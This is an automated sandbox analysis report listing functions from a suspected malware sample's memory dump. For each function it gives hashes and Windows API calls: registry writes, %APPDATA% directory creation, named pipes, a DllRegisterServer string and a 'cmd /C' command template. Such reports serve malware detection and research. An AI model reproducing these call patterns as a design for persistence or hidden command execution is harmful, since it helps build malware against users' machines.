  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
